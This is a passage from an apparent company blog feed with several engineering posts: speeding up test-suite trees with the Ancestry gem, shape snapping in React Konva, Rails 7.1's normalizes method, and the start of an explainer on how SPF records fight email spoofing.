In the case of a root node, the <code>ancestry</code> will be <code>null</code>.</p><p>The table below shows how the suites in our example are stored in the database using <code>materialized_path</code>:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s1</td><td>null</td></tr><tr><td>s11</td><td>s1</td></tr><tr><td>s111</td><td>s1/s11</td></tr><tr><td>s12</td><td>s1</td></tr></tbody></table><p>This arrangement of node IDs as a single string makes it easier to query for all descendants of a node, as we can use SQL string functions to match on the <code>ancestry</code> column. Here is the SQL statement to get the descendants of suite s1:</p><pre><code class="language-sql">SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE (&quot;suites&quot;.&quot;ancestry&quot; LIKE 's1/%' OR &quot;suites&quot;.&quot;ancestry&quot; = 's1')</code></pre><p>The result of the above query is:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s11</td><td>s1</td></tr><tr><td>s111</td><td>s1/s11</td></tr><tr><td>s12</td><td>s1</td></tr></tbody></table><h4>materialized_path2</h4><p><code>materialized_path2</code> stores ancestors in the format &quot;/id-1/id-2/id-3/&quot;, where <code>id-1</code> is the root node, <code>id-2</code> is the child of <code>id-1</code>, and <code>id-3</code> is the child of <code>id-2</code>. The delimiter is <code>/</code>, the same as in <code>materialized_path</code>, but the <code>ancestry</code> starts and ends with a <code>/</code>.
For a root node, the <code>ancestry</code> will be <code>/</code>.</p><p>The table below shows how the suites in our example are stored in the database using <code>materialized_path2</code>:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s1</td><td>/</td></tr><tr><td>s11</td><td>/s1/</td></tr><tr><td>s111</td><td>/s1/s11/</td></tr><tr><td>s12</td><td>/s1/</td></tr></tbody></table><p>The SQL statement to get the descendants of suite s1 is:</p><pre><code class="language-sql">SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE &quot;suites&quot;.&quot;ancestry&quot; LIKE '/s1/%'</code></pre><p>The result of the above query is:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s11</td><td>/s1/</td></tr><tr><td>s111</td><td>/s1/s11/</td></tr><tr><td>s12</td><td>/s1/</td></tr></tbody></table><p>If we compare the two SQL queries, we can see that <code>materialized_path2</code> needs one less &quot;OR&quot; condition. This gives <code>materialized_path2</code> a slight advantage in performance.</p><p>In NeetoTestify, we previously used the <code>materialized_path</code> format, but we have now migrated to <code>materialized_path2</code> for improved performance.</p><h3>2. Added collation to the ancestry column</h3><p>In database systems, <a href="https://www.npgsql.org/efcore/misc/collations-and-case-sensitivity.html?tabs=data-annotations">collation</a> specifies how data is sorted and compared. It provides the sorting rules, case sensitivity, and accent sensitivity properties for the data in the database.</p><p>As mentioned above, our resulting query for fetching the descendants of a node would be:</p><pre><code class="language-sql">SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE &quot;suites&quot;.&quot;ancestry&quot; LIKE '/s1/%'</code></pre><p>It uses a <code>LIKE</code> query for comparison with a wildcard character (%).
In general, when using a <code>LIKE</code> query with a wildcard character (%) on the right-hand side of the pattern, the database can utilize an index and potentially optimize the query performance. This optimization holds true for ASCII strings.</p><p>However, it's important to note that this optimization may not necessarily hold true for Unicode strings, as Unicode characters can have varying lengths and different sorting rules compared to ASCII characters.</p><p>In our case, the <code>ancestry</code> column contains only ASCII strings. If we let the database know about this constraint, we can optimize the database's query performance. To do that, we need to specify the collation type of the <code>ancestry</code> column.</p><p>From <a href="https://www.postgresql.org/docs/current/collation.html">Postgres's documentation</a>:</p><blockquote><p>The C and POSIX collations both specify traditional C behavior, in which only the ASCII letters A through Z are treated as letters, and sorting is done strictly by character code byte values.</p></blockquote><p>Since we are using Postgres in NeetoTestify, we use collation <code>C</code>. If we were using MySQL instead, the Ancestry gem suggests using collation <code>utf8mb4_bin</code>.</p><pre><code class="language-rb">class AddAncestryToTable &lt; ActiveRecord::Migration[6.1]
  def change
    change_table(:table) do |t|
      # postgres
      t.string &quot;ancestry&quot;, collation: 'C', null: false
      t.index &quot;ancestry&quot;

      # mysql
      t.string &quot;ancestry&quot;, collation: 'utf8mb4_bin', null: false
      t.index &quot;ancestry&quot;
    end
  end
end</code></pre><h3>3. Usage of arrange method</h3><p>Previously, we were constructing the tree structure of the suites by fetching the children of each node individually from the database. For this, we first fetched the suites whose <code>ancestry</code> is <code>/</code> (root nodes).
Then, for each of these suites, we fetched their children, and repeated this process until we reached the leaf-level suites.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/previous-approach-to-list-suites.png" alt="Previous approach to list suites"></p><p>This recursive approach results in a large number of database queries, causing performance issues as the tree size increases. Constructing a tree with n (4) nodes required n+1 (5) database queries, adding to the complexity of the process.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/current-approach-to-list-suites.png" alt="Current approach to list suites"></p><p>The <code>arrange</code> method provided by the Ancestry gem converts the array of nodes into nested hashes, utilizing the <code>ancestry</code> column information. Also, by using this method, the number of database queries will remain 1, even if the number of suites and nested suites increases.</p><pre><code class="language-rb">suites = project.suites
# SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE &quot;suites&quot;.&quot;project_id&quot; = &quot;p1&quot;
# [
#   &lt;Suite id: &quot;s1&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1&quot;, ancestry: &quot;/&quot;&gt;,
#   &lt;Suite id: &quot;s11&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1.1&quot;, ancestry: &quot;/s1/&quot;&gt;,
#   &lt;Suite id: &quot;s111&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1.1.1&quot;, ancestry: &quot;/s1/s11/&quot;&gt;,
#   &lt;Suite id: &quot;s12&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1.2&quot;, ancestry: &quot;/s1/&quot;&gt;
# ]

suites.arrange
# {
#   &lt;Suite id: s1, project_id: &quot;p1&quot;, name: &quot;Suite 1&quot;, ancestry: &quot;/&quot;&gt; =&gt; {
#     &lt;Suite id: s11, project_id: &quot;p1&quot;, name: &quot;Suite 1.1&quot;, ancestry: &quot;/s1/&quot;&gt; =&gt; {
#       &lt;Suite id: s111, project_id: &quot;p1&quot;, name: &quot;Suite 1.1.1&quot;, ancestry: &quot;/s1/s11/&quot;&gt; =&gt; {}
#     },
#     &lt;Suite id: s12, project_id: &quot;p1&quot;, name: &quot;Suite 1.2&quot;, ancestry: &quot;/s1/&quot;&gt; =&gt; {}
#   }
# }</code></pre><p>The recursive approach took 5.72 seconds to retrieve 170 suites, while the array conversion approach of the <code>arrange</code> method retrieved the same number of suites in 728.72 ms.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/performance-comparison.png" alt="Performance comparison"></p><p>The above image shows the performance advantage of using the <code>arrange</code> method over the recursive approach. For the comparison of the two approaches, 170 suites and 1650 test cases were considered.</p><p>By implementing the above 3 best practices, we were able to considerably improve the overall performance of the application.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Shape snapping with React Konva while building NeetoWireframe]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/shape-snapping-with-react-konva"/>
      <updated>2023-05-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/shape-snapping-with-react-konva</id>
<content type="html"><![CDATA[<h3>Introduction</h3><p>Shape snapping is a feature in software that allows shapes or objects to be automatically aligned or adjusted to a particular grid when they are moved or resized. This feature helps to ensure that shapes are properly aligned and positioned in relation to other shapes, making it easier to build a design where things are properly aligned.</p><p>We needed &quot;shape snapping&quot; in <a href="https://neeto.com/neetowireframe">NeetoWireframe</a>. NeetoWireframe is a tool for creating interactive wireframes and prototypes. NeetoWireframe is one of the various tools being built by <a href="https://neeto.com">neeto</a>.</p><p>NeetoWireframe uses <a href="https://konvajs.org/docs/react/Intro.html">React Konva</a> to build wireframes and prototypes. React Konva is a JavaScript library that provides a React component interface to Konva, a powerful 2D drawing library for the web. React Konva enables developers to create and manipulate complex graphics and visualizations in a declarative and efficient way using familiar React patterns. With React Konva, developers can easily create canvas-based applications, animations, interactive games, and rich user interfaces. React Konva is highly customizable and provides many features, such as shapes, animations, event handling, and filters. 
It is an open-source library and is widely used in web development projects.</p><p>Let's see how we implemented snapping shapes while dragging them in the canvas, based on the position of other shapes in the canvas.</p><h3>Setting up the canvas</h3><p>To begin, we will set up the canvas with a few shapes.</p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;
import { Stage, Layer, Rect, Circle } from &quot;react-konva&quot;;

const SHAPES = [
  {
    id: &quot;1&quot;,
    x: 0,
    y: 0,
    height: 100,
    width: 100,
    fill: &quot;red&quot;,
    shape: Rect,
  },
  {
    id: &quot;2&quot;,
    x: 170,
    y: 150,
    height: 100,
    width: 100,
    fill: &quot;blue&quot;,
    shape: Rect,
  },
  {
    id: &quot;3&quot;,
    x: 200,
    y: 350,
    height: 100,
    width: 100,
    fill: &quot;black&quot;,
    shape: Circle,
  },
  {
    id: &quot;4&quot;,
    x: 450,
    y: 250,
    height: 100,
    width: 100,
    fill: &quot;green&quot;,
    shape: Circle,
  },
];

export default function App() {
  return (
    &lt;div style={{ width: window.innerWidth, height: window.innerHeight }}&gt;
      &lt;Stage width={window.innerWidth} height={window.innerHeight}&gt;
        &lt;Layer&gt;
          {SHAPES.map(({ shape: Shape, ...props }) =&gt; (
            &lt;Shape key={props.id} draggable name=&quot;shape&quot; {...props} /&gt;
          ))}
        &lt;/Layer&gt;
      &lt;/Stage&gt;
    &lt;/div&gt;
  );
}</code></pre><p>The <code>name</code> prop is passed to all the Shapes in the canvas with a value of <code>&quot;shape&quot;</code>. 
This helps us to query and find the shapes in the canvas that we need to use for the snapping logic.</p><p>We have now set up a canvas with a few circles and squares that can be dragged. Link to <a href="https://codesandbox.io/s/trusting-darwin-cj55c7?file=/src/App.js">Codesandbox</a>.</p><p><img src="/blog_images/2023/shape-snapping-with-react-konva/draggable-canvas.gif" alt="Draggable canvas"></p><h3>Let's add a Transformer</h3><p>In Konva, a <code>Transformer</code> is a node that allows a user to transform or manipulate a selected Konva shape on a canvas. It provides handles for rotating, scaling, and dragging the selected shape.</p><p>We add a <code>Transformer</code> node to allow the user to apply transformations to the shapes in the canvas. Transformations like translation, scaling and rotation can be triggered on shapes through the provided handles. We will also be listening to events from the transformer node for implementing the snapping.</p><p><img src="/blog_images/2023/shape-snapping-with-react-konva/transforms-demo.gif" alt="Transforms demo"></p><p><code>Transformer</code> can be imported from <code>react-konva</code> just like the other nodes. We can add a transformer to the canvas by adding it as a child to the <code>Layer</code>. Be sure to include a reference to both the <code>Transformer</code> and the <code>Stage</code> so that we can access them later.</p><p>Let's also configure an <code>onMouseDown</code> handler for shapes to select the shape and attach it to the transformer whenever we click on them. 
To unselect when clicking outside of a shape, add an <code>onClick</code> handler in the Stage to remove the nodes from the <code>Transformer</code> by validating whether the event target is the <code>Stage</code> node.</p><pre><code class="language-jsx">export default function App() {
  const stageRef = useRef();
  const transformerRef = useRef();

  return (
    &lt;div style={{ width: window.innerWidth, height: window.innerHeight }}&gt;
      &lt;Stage
        onClick={e =&gt;
          e.target === stageRef.current &amp;&amp; transformerRef.current.nodes([])
        }
        ref={stageRef}
        width={window.innerWidth}
        height={window.innerHeight}
      &gt;
        &lt;Layer&gt;
          {SHAPES.map(({ shape: Shape, ...props }) =&gt; (
            &lt;Shape
              key={props.id}
              draggable
              name=&quot;shape&quot;
              onMouseDown={e =&gt; transformerRef.current.nodes([e.currentTarget])}
              {...props}
            /&gt;
          ))}
          &lt;Transformer ref={transformerRef} /&gt;
        &lt;/Layer&gt;
      &lt;/Stage&gt;
    &lt;/div&gt;
  );
}</code></pre><h3>Implementing snapping</h3><p>Now that we have set up the Transformer, let's implement snapping. With that feature, when a shape is dragged near another shape, the edges or the center of the dragged shape should automatically align with the edges or the center of the other shape in such a way that they are in the same line.</p><p>We will also show horizontal and vertical lines to visualize the snapping.</p><p><img src="/blog_images/2023/shape-snapping-with-react-konva/snapping-demo.gif" alt="Snapping Demo"></p><p>We will be using the <code>dragmove</code> event on the Transformer node to implement snapping.</p><p>On the <code>dragmove</code> event, we will first find the possible snapping lines based on all the shapes on the canvas.</p><p>To get all shapes on the canvas, we can use the <code>find</code> method on the <code>Stage</code> node. 
We will be using the <code>name</code> prop that we passed to all the shapes to query and get all the shapes in the canvas.</p><p>We don't want the selected shape to be considered for snapping. So we will be passing the selected shape as an argument <code>excludedShape</code> to the function.</p><p>The <code>getClientRect</code> method on a shape node returns the bounding box rectangle of the node irrespective of its shape. We will be using that to find the edges and center of each shape.</p><pre><code class="language-js">const getSnapLines = excludedShape =&gt; {
  const stage = stageRef.current;
  if (!stage) return;

  const vertical = [];
  const horizontal = [];

  // We snap over edges and center of each object on the canvas
  // We can query and get all the shapes by their name property `shape`.
  stage.find(&quot;.shape&quot;).forEach(shape =&gt; {
    // We don't want to snap to the selected shape, so we will be passing them as `excludedShape`
    if (shape === excludedShape) return;

    const box = shape.getClientRect({ relativeTo: stage });
    vertical.push([box.x, box.x + box.width, box.x + box.width / 2]);
    horizontal.push([box.y, box.y + box.height, box.y + box.height / 2]);
  });

  return {
    vertical: vertical.flat(),
    horizontal: horizontal.flat(),
  };
};</code></pre><p>Then we find the snapping points for the selected shape.</p><p>The <code>Transformer</code> node creates a shape named <code>back</code> that covers the entire selected shape area. We will be using that to find the snapping edges of the selected shape.</p><p>The relative position of the <code>back</code> shape to the <code>Stage</code> node is the same as that of the selected shape. 
So we can use the <code>getClientRect</code> method on the <code>back</code> shape to get the bounding box of the selected shape.</p><pre><code class="language-js">const getShapeSnappingEdges = () =&gt; {
  const stage = stageRef.current;
  const tr = transformerRef.current;
  const box = tr.findOne(&quot;.back&quot;).getClientRect({ relativeTo: stage });
  const absPos = tr.findOne(&quot;.back&quot;).absolutePosition();

  return {
    vertical: [
      // Left vertical edge
      {
        guide: box.x,
        offset: absPos.x - box.x,
        snap: &quot;start&quot;,
      },
      // Center vertical edge
      {
        guide: box.x + box.width / 2,
        offset: absPos.x - box.x - box.width / 2,
        snap: &quot;center&quot;,
      },
      // Right vertical edge
      {
        guide: box.x + box.width,
        offset: absPos.x - box.x - box.width,
        snap: &quot;end&quot;,
      },
    ],
    horizontal: [
      // Top horizontal edge
      {
        guide: box.y,
        offset: absPos.y - box.y,
        snap: &quot;start&quot;,
      },
      // Center horizontal edge
      {
        guide: box.y + box.height / 2,
        offset: absPos.y - box.y - box.height / 2,
        snap: &quot;center&quot;,
      },
      // Bottom horizontal edge
      {
        guide: box.y + box.height,
        offset: absPos.y - box.y - box.height,
        snap: &quot;end&quot;,
      },
    ],
  };
};</code></pre><p>From the possible snapping lines and the snapping edges of the selected shape, we will find the closest snapping lines.</p><p>We will define a <code>SNAP_THRESHOLD</code> to fix how close the shape should be to a snapping line to trigger a snap. Let's give it a value of <code>5</code> pixels. 
Based on the threshold, we will find the snap lines that can be considered for snapping.</p><p>Sorting the snap lines based on the distance between the line and the selected shape will give us the closest snapping line as the first element in the array.</p><pre><code class="language-js">const SNAP_THRESHOLD = 5;

const getClosestSnapLines = (possibleSnapLines, shapeSnappingEdges) =&gt; {
  const getAllSnapLines = direction =&gt; {
    const result = [];
    possibleSnapLines[direction].forEach(snapLine =&gt; {
      shapeSnappingEdges[direction].forEach(snappingEdge =&gt; {
        const diff = Math.abs(snapLine - snappingEdge.guide);
        // If the distance between the line and the shape is less than the threshold, we will consider it a snapping point.
        if (diff &gt; SNAP_THRESHOLD) return;

        const { snap, offset } = snappingEdge;
        result.push({ snapLine, diff, snap, offset });
      });
    });
    return result;
  };

  const resultV = getAllSnapLines(&quot;vertical&quot;);
  const resultH = getAllSnapLines(&quot;horizontal&quot;);

  const closestSnapLines = [];
  const getSnapLine = ({ snapLine, offset, snap }, orientation) =&gt; {
    return { snapLine, offset, orientation, snap };
  };

  // find closest vertical and horizontal snapping lines
  const [minV] = resultV.sort((a, b) =&gt; a.diff - b.diff);
  const [minH] = resultH.sort((a, b) =&gt; a.diff - b.diff);

  if (minV) closestSnapLines.push(getSnapLine(minV, &quot;V&quot;));
  if (minH) closestSnapLines.push(getSnapLine(minH, &quot;H&quot;));

  return closestSnapLines;
};</code></pre><p>We need the closest snapping lines to be drawn on the canvas. We will be using the <code>Line</code> node from <code>react-konva</code> for that. 
We can add a pair of states to store the coordinates of the vertical and horizontal lines.</p><p>We will split the closest snapping lines into horizontal and vertical lines and set them in the corresponding states.</p><pre><code class="language-js">const drawLines = (lines = []) =&gt; {
  if (lines.length &gt; 0) {
    const lineStyle = {
      stroke: &quot;rgb(0, 161, 255)&quot;,
      strokeWidth: 1,
      name: &quot;guid-line&quot;,
      dash: [4, 6],
    };

    const hLines = [];
    const vLines = [];

    lines.forEach(l =&gt; {
      if (l.orientation === &quot;H&quot;) {
        const line = {
          points: [-6000, 0, 6000, 0],
          x: 0,
          y: l.snapLine,
          ...lineStyle,
        };
        hLines.push(line);
      } else if (l.orientation === &quot;V&quot;) {
        const line = {
          points: [0, -6000, 0, 6000],
          x: l.snapLine,
          y: 0,
          ...lineStyle,
        };
        vLines.push(line);
      }
    });

    // Set state
    setHLines(hLines);
    setVLines(vLines);
  }
};</code></pre><p>Let's combine all the above functions and create an <code>onDragMove</code> handler for the <code>Transformer</code> node.</p><p>We will be using the <code>getNodes</code> method on the <code>Transformer</code> node to get the selected shape.</p><p>Based on the selected shape and the canvas, we will find the closest snapping lines.</p><p>If there are no snapping lines within the <code>SNAP_THRESHOLD</code>, we will clear the lines from the canvas and return from the function.</p><p>Otherwise, we will draw the lines on the canvas and calculate the new position of the selected shape based on the closest snapping lines.</p><pre><code class="language-js">const onDragMove = () =&gt; {
  const target = transformerRef.current;
  const [selectedNode] = target.getNodes();
  if (!selectedNode) return;

  const possibleSnappingLines = getSnapLines(selectedNode);
  const selectedShapeSnappingEdges = getShapeSnappingEdges();
  const closestSnapLines = getClosestSnapLines(
    possibleSnappingLines,
    selectedShapeSnappingEdges
  );

  // Do nothing if no snapping lines
  if (closestSnapLines.length === 0) {
    setHLines([]);
    setVLines([]);
    return;
  }

  // draw the lines
  drawLines(closestSnapLines);

  const orgAbsPos = target.absolutePosition();
  const absPos = target.absolutePosition();

  // Find new position
  closestSnapLines.forEach(l =&gt; {
    const position = l.snapLine + l.offset;
    if (l.orientation === &quot;V&quot;) {
      absPos.x = position;
    } else if (l.orientation === &quot;H&quot;) {
      absPos.y = position;
    }
  });

  // calculate the difference between original and new position
  const vecDiff = {
    x: orgAbsPos.x - absPos.x,
    y: orgAbsPos.y - absPos.y,
  };

  // apply the difference to the selected shape.
  const nodeAbsPos = selectedNode.getAbsolutePosition();
  const newPos = {
    x: nodeAbsPos.x - vecDiff.x,
    y: nodeAbsPos.y - vecDiff.y,
  };

  selectedNode.setAbsolutePosition(newPos);
};</code></pre><p>Finally, let's include the above functions inside the component and attach the <code>onDragMove</code> handler to the <code>Transformer</code>.</p><pre><code class="language-jsx">export default function App() {
  const [hLines, setHLines] = useState([]);
  const [vLines, setVLines] = useState([]);
  const stageRef = useRef();
  const transformerRef = useRef();

  // define onDragMove here

  return (
    &lt;div style={{ width: window.innerWidth, height: window.innerHeight }}&gt;
      &lt;Stage ref={stageRef} width={window.innerWidth} height={window.innerHeight}&gt;
        &lt;Layer&gt;
          {SHAPES.map(({ shape: Shape, ...props }) =&gt; (
            &lt;Shape
              key={props.id}
              name=&quot;shape&quot;
              onMouseDown={e =&gt; transformerRef.current.nodes([e.currentTarget])}
              draggable
              {...props}
            /&gt;
          ))}
          &lt;Transformer ref={transformerRef} onDragMove={onDragMove} /&gt;
          {hLines.map((item, i) =&gt; (
            &lt;Line key={i} {...item} /&gt;
          ))}
          {vLines.map((item, i) =&gt; (
            &lt;Line key={i} {...item} /&gt;
          ))}
        &lt;/Layer&gt;
      &lt;/Stage&gt;
    &lt;/div&gt;
  );
}</code></pre><p>We have successfully implemented snapping functionality in the canvas, allowing the shapes to snap to a specific location while being dragged. You can now try moving the shapes near the edges and center of other shapes to see the snapping in action.<img src="/blog_images/2023/shape-snapping-with-react-konva/snapping-demo.gif" alt="Snapping Demo"></p><p>All implementation details and a live demo can be found in this <a href="https://codesandbox.io/s/floral-browser-8y5gvb">CodeSandbox</a>.</p><p><em><a href="https://www.neeto.com/neetowireframe">NeetoWireframe</a> has not been launched for everyone yet. We are internally using it and are happy with how it's shaping up. If you want to give it a try, then please send an email to invite@neeto.com.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds ActiveRecord::Base::normalizes]]></title>
       <author><name>Abhijith Sheheer</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-activerecord-base-normalizes"/>
      <updated>2023-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-activerecord-base-normalizes</id>
<content type="html"><![CDATA[<p>Rails 7.1 has introduced a new method in Active Record that can be used to declare normalizations for attribute values. This can be especially useful for sanitizing user input, ensuring consistent formatting, or cleaning up data from external sources.</p><p>Before Rails 7.1, you could normalize attributes using a <code>before_save</code> callback.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  before_save :downcase_email, if: :email_present?

  private

    def email_present?
      email.present?
    end

    def downcase_email
      email.downcase!
    end
end</code></pre><p>In Rails 7.1, you can refactor the above to the code below.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  normalizes :email, with: -&gt; email { email.downcase }
end</code></pre><p>The normalization is applied when the attribute is assigned or updated, and the normalized value will be persisted to the database. The normalization is also applied to the corresponding keyword argument of finder methods. This allows a record to be created and later queried using unnormalized values.</p><p>By default, normalization is not applied to <code>nil</code> values. To normalize <code>nil</code> values, you can enable it using the <code>:apply_to_nil</code> option.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  normalizes :user_name, with:
    -&gt; user_name { user_name.parameterize.underscore }

  normalizes :email, with: -&gt; { _1.strip.downcase }

  normalizes :profile_image, with:
    -&gt; profile_image {
      profile_image.present? ? URI.parse(profile_image).to_s :
        &quot;https://source.boringavatars.com/beam&quot; },
    apply_to_nil: true
end</code></pre><pre><code class="language-ruby"># rails console
&gt;&gt; User.create!(user_name: &quot;Eve Smith&quot;, email: &quot;eveSmith@EXAMPLE.com&quot;)
#&lt;User:0x000000010b757090 id: 1, user_name: &quot;eve_smith&quot;, profile_image: &quot;https://source.boringavatars.com/beam&quot;, email: &quot;evesmith@example.com&quot;, created_at: Wed, 03 May 2023 07:49:20.067765000 UTC +00:00, updated_at: Wed, 03 May 2023 07:49:20.067765000 UTC +00:00&gt;

&gt;&gt; user = User.find_by!(email: &quot;EVESMITH@example.COM&quot;)
&gt;&gt; user.email # =&gt; &quot;evesmith@example.com&quot;

&gt;&gt; User.exists?(email: &quot;EveSmith@Example.COM&quot;) # =&gt; true</code></pre><p>If a user's email was already stored in the database before the normalization statement was added to the model, the email will not be retrieved in the normalized format.</p><p>This is because in the database it's stored in mixed case, that is, without the normalization. If you have legacy data, you can normalize it explicitly using the <code>Normalization#normalize_attribute</code> method.</p><pre><code class="language-ruby"># rails console
&gt;&gt; legacy_user = User.find(1)
&gt;&gt; legacy_user.email  # =&gt; &quot;adamSmith@EXAMPLE.com&quot;
&gt;&gt; legacy_user.normalize_attribute(:email)
&gt;&gt; legacy_user.email  # =&gt; &quot;adamsmith@example.com&quot;
&gt;&gt; legacy_user.save</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/43945">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How SPF protects domain reputation and helps in email deliverability]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-spf-protects-domain-reputation"/>
      <updated>2023-04-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-spf-protects-domain-reputation</id>
<content type="html"><![CDATA[<p>Email is a wonderful thing. Anyone can send an email to anyone, and it all works beautifully. In the early stages of the Internet, we didn't have to worry about security and scammers. As emails started to play a more vital role in our lives, scammers started to con people to steal their money.</p><p>Not only can anyone send an email to anyone, but anyone can pretend to be anyone. I can send an email to you and the email will come to you as if it were sent by &quot;Elon Musk&quot; and the from address could be &quot;elon@musk.com&quot;.</p><p>I can send an email to you pretending that the email is from your bank and that you need to change your password. In one case, a hacker sent an email to a company's finance team telling them that the company's bank account number had changed. The hacker walked away with millions of dollars.</p><p>Hackers can also do damage to one's domain reputation.</p><p>Let's assume that there is a business called &quot;PrixPapers&quot; and they have thousands of customers all over the country. Malicious folks can start sending emails to people pretending to be &quot;PrixPapers&quot;. When people receive an email like this they might buy the item. The item could be &quot;fake goods&quot;. Ideally, no one should be able to send any email pretending to be someone else.</p><p>Since these malicious folks don't have the actual list of the customers of PrixPapers, they will in general spam people. Some people receiving this email will mark these emails as &quot;spam&quot;. As more and more people mark these emails as &quot;spam&quot;, the domain reputation of &quot;prixpapers.com&quot; will go down. It means that when &quot;prixpapers.com&quot; sends out a legitimate newsletter to its customers, some of these emails will be marked as &quot;spam&quot; because of the nefarious work done by the previous scammer.</p><p>The challenge presented to the Internet authorities is that they want to keep email simple but safe at the same time. 
They came up with certain policies to make emails safe and secure. In this blog, we will see how SPF helps in keeping email secure. However, first, we need to know what &quot;Return-path&quot; is. We'll later see how it is used in blocking fake emails.</p><h3>Return-path</h3><p>Let's say that we are dealing with a company called <a href="https://www.neeto.com/neetocal">NeetoCal</a>. They have the domain <em>neetocal.com</em>.</p><p>Let's say that <em>brian@neetocal.com</em> sent an email to <em>peter@gmail.com</em>. Let's pretend that for some reason Peter's mailbox is full and the email sent by Brian bounces. In that case, Brian will get an email that the message bounced. We all have seen these kinds of messages.</p><p>Now let's imagine that it's end of the year sale time and NeetoCal decided to send an email campaign to all its customers giving them a 10% discount. This email will go out to their 5000 customers. Some of these emails are bound to bounce. If all the bounced emails come to Brian then Brian's inbox would be filled with such bounced emails.</p><p>To solve this problem the email protocol allows us to set a hidden field called <em>Return-path</em>. This value can be set in the email header. The <em>Return-path</em> set in the email header indicates how to process bounced emails. Anytime an email server detects that an email can't be delivered for reasons like &quot;mailbox is full&quot; or &quot;the email doesn't exist&quot;, that email server can send an email to the email address mentioned in <em>Return-path</em>. The business owner can look at <em>Return-path</em> emails to analyze how many emails are bouncing and why.</p><p>If you are sending an email using &quot;Gmail&quot;, &quot;Outlook&quot;, &quot;Yahoo&quot; etc then the <em>Return-path</em> is set as your email so that you get to know if there is a bounced email. Email service providers allow us to customize the <em>Return-path</em> in case one is running a big marketing campaign. 
For example, here is a <a href="https://sendgrid.com/blog/what-is-return-path">document</a> from SendGrid describing how to set the <em>Return-path</em>.</p><p>Why are we talking about how bounced emails are processed when we are dealing with the subject of &quot;email deliverability&quot;? That's because <em>Return-path</em> plays a dual role, as we will see next.</p><h2>What is an SPF record</h2><p>Before we get into the SPF record, let's take a simple real-world example of how it works.</p><p>Let's say there's a gatekeeper at the NeetoCal office. This gatekeeper will only allow in the people who work there. It means the gatekeeper has a list of approved people, and for each person getting through the gate, the gatekeeper checks if the person is in the approved list or not.</p><p>SPF works similarly. SPF policy is a mechanism to tell the email server: if the email is coming from a trusted source, accept the email, else reject the email. A Sender Policy Framework (SPF) record is a type of DNS TXT record that lists all the servers authorized to send emails from a particular domain.</p><p>Let's take a real-world example. The SPF record of neetocal.com looks like <code>v=spf1 include:spf.messagingengine.com -all</code>. We can see this data <a href="https://mxtoolbox.com/SuperTool.aspx?action=spf%3aneetocal.com&amp;run=toolpage">using mxtoolbox</a>.</p><h3>How the SPF record is used</h3><p>Let's look at the following case.</p><p>Step 1. <em>notifications@neetocal.com</em> sends an email to <em>elon@gmail.com</em>.</p><p>Step 2. This email is sent to <a href="https://fastmail.com">Fastmail</a> since NeetoCal is using the Fastmail services.</p><p>Step 3. The Fastmail email server receives this email as an outgoing email.</p><p>Step 4. The Fastmail email server sets the email header <em>Return-path</em> value to &quot;notifications@neetocal.com&quot;.</p><p>Step 5. The Fastmail email server sends this email to the Gmail server.</p><p>Step 6. The Gmail server gets this email.</p><p>Step 7. 
The Gmail server extracts the <em>Return-path</em> key and finds that the domain is &quot;neetocal.com&quot;.</p><p>Step 8. The Gmail server finds the TXT DNS records of &quot;neetocal.com&quot;. This lists all the approved IP addresses.</p><p>Step 9. The Gmail server will check if the email server which sent the email is in the approved IP addresses or not.</p><p>Step 10. If the IP address is in the approved IP addresses list then the email is approved for further processing. Otherwise, the email is rejected.</p><p>We can go to https://dmarcian.com/spf-survey/ and enter &quot;neetocal.com&quot; there. They get the IP addresses published for &quot;messagingengine.com&quot; and then they show the list of the approved IPs.</p><h3>Allowing a third party to send emails on your behalf</h3><p>Let's say that Brian decides to use <a href="https://www.mailerlite.com">Mailerlite</a> to send marketing emails. Now if Mailerlite sends an email then the receiving email server will notice that the IP address of Mailerlite is not in the approved list of IPs and the email will be rejected.</p><p>A domain is allowed to have only one SPF record. So if NeetoCal wants to use Mailerlite for marketing then the SPF record needs to be updated. If you sign up for a domain in Mailerlite then Mailerlite will check if that domain has an existing SPF record or not. If there is no SPF record then Mailerlite won't do anything. However, if there is an existing SPF record then Mailerlite will insist that you first update the SPF record to include Mailerlite so that the emails from Mailerlite are not rejected.</p><p><a href="https://bigbinary.com">BigBinary</a> uses Mailerlite to email newly published blogs to the subscribers. Given below is what the SPF record of BigBinary looks like. 
